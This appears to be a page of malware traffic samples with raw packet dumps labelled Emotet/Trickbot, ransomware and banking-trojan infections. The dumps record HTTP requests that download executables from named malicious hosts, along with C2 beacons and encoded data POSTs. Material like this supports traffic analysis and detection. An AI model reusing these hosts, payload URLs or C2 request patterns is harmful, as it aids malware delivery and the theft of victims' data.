@.<4……#8o.$.1Y..D….W76 2019-08-26 15:03:01.504670 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
E..8.{@…’g
..e….....$t.@.<4..........I..". wI.....: 2019-08-26 15:03:01.528689 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 254 E....|@....g ..e.. ..7......@:..k..$b....Jb.....r.u.7..........?2..;h.E...N}...h>W.r....r_]...'....|..YTb..7i..:i..3..Y.U......'!.jd.6.~..5...i.],+O....n9.I.G......B..<..ND./...<...1.+....R..Y...F.B.l .Xge....@x.L.a.,K.1a...,.m....L. ^7.Y...6UR.E....R..e...>X5w.....D..=f....Ku...y* 2019-08-26 15:03:01.573710 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8.}@....H ..e.. ..7...$.r@:..k..$b ...I..L@...;.fV..z 2019-08-26 15:03:01.576544 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 337 E..m.~@..... ..e.. ..7...YGh@:..k..$b foU?.....]...C.T.+...K.....s"......,....=(K.[.w...+.E....~|.T....'.cgK,.!....V.:._q.g.~..R.i.....H..a...u."#xJ/_.@.M.b...[.."s..Q.*])...C.<........P.!2...nA..5h....M&.j..!.H..Z.K..F.w..b.....)...Y.......e6t=.\......……..”…….f….>……:…=X._.. k..P…,5…e.A%t?o.?….C.=P7P.p.&.@.M ……..6’…….(.R5..s.e0..h.
2019-08-26 15:03:01.625002 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8..@….E
..e.. ..7…$R.@:..k..$b.8 ..@…0..@.um…
2019-08-26 15:03:01.802524 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 247
E…..@….f
..e.. ..7….1X@:..k..$b.,|..|..;….id{.,.4.3……..=L_g…Q..Q.V.z{…1}..2.L.4…….!…0^+.P…+……G[g..m..5<.(7..[….v.w…j.<&z..rl.s[x…T..aJ&3jm:^….=.n..a.?.U.m&..I..SI.V…}.h.[…h..0…|.p…K#}V~c..k,..o.s.…N…@.w….W…..4~U.! ..CF.. 2019-08-26 15:03:01.849036 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8..@….@ ..e.. ..7…$..@:..k..$b..|…+:.ZQ…..o. 2019-08-26 15:03:03.418784 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$_D@M…..K?…6L…..K……0b
2019-08-26 15:03:03.421675 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$.@@M…..K?.?q8#.8a.Uu?…{H O
2019-08-26 15:03:03.421733 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$?A@M…..K?..?w....}...N=..5. 2019-08-26 15:03:03.421795 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$.^@M.....K?.|.2.\9..g.9..]...7 2019-08-26 15:03:03.422363 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$..@M.....K?...J...T.J.pU.].... 2019-08-26 15:03:03.422395 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$ab@M.....K?.j.U..aAm..*.5%._Z. 2019-08-26 15:03:03.424121 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$p.@M.....K?..X+O.Ts.L..9:..M.. 2019-08-26 15:03:03.424206 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8. @..... ..e.. ......$..@M.....K?.}..j...!.@.z.Du..9 2019-08-26 15:03:03.424444 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.!@..... ..e.. ......$..@M.....K?.......B#...._MC}.h 2019-08-26 15:03:03.435279 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.H@..... ..e.. ......$4O@M.....K?....P0.&..%.M..9*Y. 2019-08-26 15:03:03.435326 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.I@..... ..e.. ......$..@M.....K?...,.OJ.......9uP4. 2019-08-26 15:03:03.435397 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.J@..... ..e.. ......$I.@M.....K?..*.v.#^.R...[~.RR. 2019-08-26 15:03:03.435469 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.K@..... ..e.. ......$a.@M.....K?....J.G.... ..c...k 2019-08-26 15:03:03.435540 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.L@..... ..e.. ......$;@@M.....K?..."h.A...1....&... 2019-08-26 15:03:03.448683 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 41 E..E.T@..... ..e.. ......1..@M.....K?.).R.8:.'.k....k.-..6....g=.G_.. 2019-08-26 15:03:03.448737 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.W@..... ..e.. ......$|.@M.....K?....F. .h."........ 2019-08-26 15:03:03.541893 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 296 E..D..@..... ..e.. ..7...0Q.@:..k..$b..>^n;".. s..Hf:T>.....W....."... ..a.#8.a..X'B..-....a.=.6..m".7.2..^ /..aA.!N... 4F..M...SJ<.F….+h…IRy5..J.B….!!ME….]Z.
..x..C.a..”Q.1..V….Bb:.;)w.(.n..[…r*}~..gM.^.…..7T.fm…s..”….$….6..L..i.d….~.u7D~.>.m0d.M..$.iX..y…….},.Z).a.w;j.. &.M.tb..9k.?.Kn+..IE1\’
2019-08-26 15:03:03.575606 IP 10.8.26.101.64439 > 172.217.9.142.443: UDP, length 1350
E..b..@…..
..e.. ……N…Q046P….2..x…. ……………CHLO….PAD…..SNI…..VER…..CCS…..UAID(…TCID,…PDMD0…SMHL4…ICSL8…NONPX…MIDS…SCLS...CSCT…COPTd…IRTTh…CFCWl…SFCWp…———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————www.google-analytics.comQ046…....~.......Chrome/76.0.3809.132 Windows NT 6.1; Win64; x64....X509........l..Y]..@T.]...W.....E.+...Zk^.o"d.......NSTP.w........…………………………………………………………………………………………………………………………………………………………………………………………………….

Emotet Banking Trojan and Trickbot Malware Traffic Sample infection w/Spambot Noise PCAP file Download

2019-09-18 13:32:22.678529 IP 10.9.18.101.49160 > 124.158.6.218.80: Flags [P.], seq 4191540612:4191540891, ack 2860101733, win 64240, length 279: HTTP: GET /wp-admin/n2keep7/ HTTP/1.1
E..?..@…Y1
.e|……P…..y.eP…Y…GET /wp-admin/n2keep7/ HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: thinhvuongmedia.com
DNT: 1
Connection: Keep-Alive

2019-09-18 13:32:22.942838 IP 124.158.6.218.80 > 10.9.18.101.49160: Flags [P.], seq 1:1277, ack 279, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$T…..A.|…
.e.P…y.e….P…….HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 17:26:02 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.33
X-Powered-By: PHP/5.6.33
Set-Cookie: 5d8268aa1193f=1568827562; expires=Wed, 18-Sep-2019 17:27:02 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 18 Sep 2019 17:26:02 GMT
Expires: Wed, 18 Sep 2019 17:26:02 GMT
Content-Disposition: attachment; filename=”i5pv72yr.exe”
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2019-09-18 13:33:30.627377 IP 10.9.18.101.49165 > 66.228.32.31.443: Flags [P.], seq 3657721627:3657721896, ack 2496123025, win 64240, length 269
E..5..@…vV
.eB. …….g…..P…”…GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Cache-Control: no-cache

2019-09-18 13:33:30.669920 IP 10.9.18.101.49164 > 189.129.4.186.80: Flags [P.], seq 899:1832, ack 2600252, win 63022, length 933: HTTP: POST /rtm/symbols/ HTTP/1.1
E…..@…..
.e…….Pr..G..^.P…….POST /rtm/symbols/ HTTP/1.1
Referer: http://189.129.4.186/rtm/symbols/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 189.129.4.186
Content-Length: 518
Connection: Keep-Alive
Cache-Control: no-cache

6ll8i995327yEb1qC=SbbKQbNltyr7OEcfzxrUQ304Q2%2FW6l5R9lo%2B5pVxib%2FIt4w3Sjeay5KbFubuIws4O0t7iA%2FTTdyiyRHbY7ySX3cga1z4cQuduITiXM9R5e7rTet9Uod5fFGxgh4JKFGS5n1sQ2TqoRhHBRx7cyBqBFIuag5dqUNeimMgsfRfYiwz39hBgErZ2D0Phl7Y6pFo%2BgASm3UxQKPwVMO8ux4AN2qvVtS2pEQ1HZZcDFci1m1YUNPlvgGhz6Gdpiiz2nZ%2Fr4fpHEK8spNliNSciLGdp7XKmD3rkLzPW5Y2Gm6J0PHywumZH0hJryQUQdwGmeWY8LiNcnQW4bRzxcA%2FSgIA0B8peygnfyCIwigVnD%2FwUBRRFjTCh5crDpm86cA9sZx1tnMgWbVF3cyJLDXvAkyYI%2B9IReYi9WIMTYjpUuPBxEm5zYaLYolpypw07kquVeRU5xXpSD3wp4D7w%2BmBFphGa1%2FKfn4%3D
2019-09-18 13:33:30.713609 IP 10.9.18.101.49166 > 104.236.185.25.8080: Flags [P.], seq 1031397366:1031397638, ack 3231780717, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….K
.eh…….=y…..mP…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:30.722484 IP 10.9.18.101.49167 > 104.236.185.25.8080: Flags [P.], seq 2799073531:2799073803, ack 2887398240, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….I
.eh………x…3`P…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:31.019952 IP 66.228.32.31.443 > 10.9.18.101.49165: Flags [P.], seq 1:211, ack 269, win 64240, length 210
E…]…..].B. .
.e……….h(P….P..HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding

e
173.66.146.112
0

2019-09-18 13:33:31.096777 IP 189.129.4.186.80 > 10.9.18.101.49164: Flags [P.], seq 2600252:2600556, ack 1832, win 64240, length 304: HTTP: HTTP/1.1 200 OK
E..X]……p….
.e.P….^.r.!.P…….HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

2019-09-18 13:33:35.224641 IP 10.9.18.101.49184 > 66.228.32.31.443: Flags [P.], seq 497095651:497096370, ack 1689891519, win 64240, length 719
E…..@…k.
.eB. .. ……d…P….x..POST /arizona/forced/sess/merge/ HTTP/1.1
Referer: http://66.228.32.31/arizona/forced/sess/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Content-Length: 274
Connection: Keep-Alive
Cache-Control: no-cache

Gr2qPfZCOq0zLdd=i7eSuPXcauG6h3x4nXsddr2HLhaseSX3P3dp7S4gBcKhcmoqkbf7HcBzb%2Brohq%2FeEkR%2BTnIjMI8V8T%2BAxqF%2FTEK2DhDrGASZbhUbLTPbf1upgbttXYNLrhthHlz4c5qcEHunBZWx0TLZ6Jd6XQvpghjIetcPXLPTuULc9957VIe9PeppR6pU9rDnk2VG%2Fw1PflceQ%2Fw59Gx%2BnGblT3orLZBUGOgmdwfAYGBjYe%2BuZLDzlb1T

smk.exe systemswift.group Ransomware Malware Trojan Download PCAP file Download Traffic Sample

2019-05-30 00:27:40.790210 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3141076432:3141076852, ack 132281672, win 16425, length 420: HTTP: GET /smk.exe HTTP/1.1
E…..@…..
.
.
.
.. .P.9….uHP.@)D…GET /smk.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:27:41.270451 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
E…..@.@.DX
.
.
.
..P. …..9.tP…+……………………………………………………………………………………………………………………………………………………………………………………………….
……………………………………………………………………………………………………………………………………………………………………………………………………………….
………………………………………………………………………………………………………………P.,…….00………… ………………..h……….. .. …. …. …….00…. ..%………….
…..L.-. .-………….Y.-.(.-………….f.-.<.-………….r.-.D.-…………………~.-…….-…-…-…-…….-…….-…..ADVAPI32.dll.KERNEL32.DLL.MSIMG32.dll.USER32.dll….RegEnumKeyA…ExitProcess…GetProcAddress..Lo adLibraryA..VirtualProtect..AlphaBlend..CreateIcon………………………….. 2019-05-30 00:27:41.471058 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
E…..@.@.DW
.2019-05-30 00:28:45.641573 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1442212575:1442212995, ack 1861255134, win 16425, length 420: HTTP: GET /upd.exe HTTP/1.1
E…..@…..
.
.
.
..!.PU.j.n…P.@)….GET /upd.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:31:43.342932 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 3366683940:3366684106, ack 1501580209, win 16425, length 166: HTTP: POST /index.php HTTP/1.1
E….1@…-P
.
.W.X..$.P…$Y.K.P.@)….POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: systemswift.group
Content-Length: 43647
Cache-Control: no-cache

2019-05-30 00:31:43.903892 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 42506:43813, ack 1, win 16425, length 1307: HTTP
E..C.V@…(.
.
.W.X..$.P..+.Y.K.P.@)H…|.[0.m}.*u.S..#u.#u.#u.#..6a.#u.#g.6f.K/. ..Vu.l .wo.2X.D0.Q..9u.3a...j1.lu.m3...w4.g4.gu.D..D’.s=.&.B1.s!.qX.Q..G..@=.j;.gu.GX.Q..#..:.f’.N<.q:.#..j#.qX.Q..#..e9.!.qu.j&.o4.#..j#.qX.._. X.X..p!.nu.q:.f&.^X. ..p!.nX. \.n&.-0.fX.&.p&.f-...j;.m<.-0.fX. &.q#.0.-0.fX. \.u6.l&.-0.fX. \.g9.k:.w{.{0. \. 1.o=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.=.p!.f-... .t8.f-... &.=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.l:.p#.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. ..b'.k..g0.f'.f-.._. \.f4.=.q:.l6.o..p!.f-... .f4.¨C11C&.p&.f-..¨C19C.G#.U..H’.B..n8.Ke.-0.fX.v%.Xd.-0.fu..¨C20C. ..q:.w9.+m.5{.-g.2m.._.HT..U..U..U..U..(…..U#.U.+U..U..U..u..U..U.A’.t&.q&.@:.h<.p .m!.q;.w..s9.q0.O:.-!.w…W..[..U..U..U.R…U…..U..U..U..T.#U…..U.l:.j0.j&.-!.w…W..[..U..U..U.&..l…:?.U..U..U..T.#U…..U.¨C12C.1c.1..4m.Bf.5d.7..3x.A…f.1b.5a.Gf.Ax.7…a.Gb.;¨C13C.E`.:..1..6f.4b.Ex.1m..a.7d.Bc.2x.2g.5g.3b.6..3c..a.7e.A..1x.Bg.Ec.2..1..6a.Ex.7…m.Ef.Gl.3..2l.2g. 2019-05-30 00:31:44.415010 IP 87.251.88.11.80 > 10.1.10.162.49188: Flags [P.], seq 1:192, ack 43813, win 32, length 191: HTTP: HTTP/1.1 200 OK
E …:@./…W.X.
.
..P.$Y.K…0IP.. .o..HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 May 2019 04:31:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.6.40

GET /sim.o t-trade.net Financial Stock Banking Malware Trojan PCAP file download sample

2019-05-29 21:16:12.610658 IP 10.1.10.162.60446 > 185.219.42.154.80: Flags [P.], seq 649603156:649603684, ack 3701990316, win 16425, length 528: HTTP: GET /sim.o HTTP/1.1
E..8w.@…..
.
…*….P&.(T….P.@)….GET /sim.o HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=240615-
Unless-Modified-Since: Wed, 29 May 2019 23:56:47 GMT
If-Range: “10d200-58a0f88c11a17”
Host: t-trade.net
Connection: Keep-Alive

2019-05-29 21:16:36.990639 IP 10.1.10.162.60447 > 77.222.57.253.80: Flags [P.], seq 1839010927:1839011208, ack 1315819563, win 16425, length 281: HTTP: POST /index.php HTTP/1.1
E..Ax.@….m
.
.M.9….Pm..oNm.+P.@)/…POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 109
Cache-Control: no-cache

J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.> 2019-05-29 21:16:37.647544 IP 77.222.57.253.80 > 10.1.10.162.60447: Flags [P.], seq 42341:43801, ack 281, win 237, length 1460: HTTP J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.>
2019-05-29 21:16:37.647544 IP 77.222.57.253.80 > 10.1.10.162.60447: Flags [P.], seq 42341:43801, ack 281, win 237, length 1460: HTTP
E …0@./..NM.9.

2019-05-29 21:16:45.383337 IP 10.1.10.162.60448 > 77.222.57.253.80: Flags [P.], seq 4169006147:4169006321, ack 1258956205, win 16425, length 174: HTTP: POST /index.php HTTP/1.1
E…~.@…..
.
.M.9.. .P.}.CK
%.P.@)L…POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 43590
Cache-Control: no-cache